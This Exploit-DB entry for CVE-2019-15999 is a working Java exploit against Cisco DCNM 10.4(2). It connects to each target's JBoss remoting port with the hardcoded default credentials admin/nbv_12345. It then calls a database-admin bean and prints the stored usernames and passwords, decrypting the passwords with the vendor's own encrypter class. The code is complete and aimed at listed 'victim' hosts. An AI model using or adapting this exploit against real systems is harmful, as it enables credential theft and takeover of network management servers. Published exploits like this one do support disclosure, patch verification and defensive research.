Cisco DCNM JBoss 10.4 - Credential Leakage

EDB-ID:

47885




Platform:

Java

Date:

2020-01-08


# Exploit Title: Cisco DCNM JBoss 10.4 - Credential Leakage
# Date: 2020-01-06
# Exploit Author: Harrison Neal
# Vendor Homepage: https://www.cisco.com/
# Software Link: https://software.cisco.com/download/home/281722751/type/282088134/release/10.4(2)
# Version: 10.4(2)
# CVE: CVE-2019-15999

# You'll need a few .jars from a copy of Cisco DCNM to compile and run this code
# To compile, file path should match ${package}/${class}.java, e.g.,
# com/whatdidibreak/dcnm_expl/Main.java

# Usage: java -jar PackagedJarFile Victim1IpOrFqdn [victim2 ...]

package com.whatdidibreak.dcnm_expl;

import com.cisco.dcbu.jaxws.san.ep.DbAdminSEI;
import com.cisco.dcbu.jaxws.wo.DBRowDO;
import com.cisco.dcbu.lib.util.jboss_4_2.JBoss_4_2Encrypter;

import java.util.Properties;

import javax.naming.Context;
import javax.naming.InitialContext;

public class Main {

    public static void main(String[] args) throws Throwable {
        for (String target : args) {
            System.out.println("Target: " + target);

            Properties jndiProps = new Properties();
            jndiProps.put(Context.INITIAL_CONTEXT_FACTORY, "org.jboss.naming.remote.client.InitialContextFactory");
            jndiProps.put(Context.PROVIDER_URL, "remote://" + target + ":4447");
            jndiProps.put(Context.SECURITY_PRINCIPAL, "admin");
            jndiProps.put(Context.SECURITY_CREDENTIALS, "nbv_12345");
            jndiProps.put("jboss.naming.client.ejb.context", true);

            Context ctx = new InitialContext(jndiProps);

            DbAdminSEI i = (DbAdminSEI) ctx.lookup("dcm/jaxws-dbadmin/DbAdminWS!com.cisco.dcbu.jaxws.san.ep.DbAdminSEI");

            for (DBRowDO row : i.getServerProperties(null).getRows()) {
                String propName = row.getEntry()[0];
                String propValue = row.getEntry()[1];

                if (propValue.isEmpty()) {
                    continue;
                }

                if (propName.contains("user")) {
                    System.out.println(propName + " = " + propValue);
                } else if (propName.contains("pass")) {
                    System.out.println(propName + " = " + propValue + " (" + JBoss_4_2Encrypter.decrypt(propValue) + ")");
                }
            }

            System.out.println();
        }
    }
}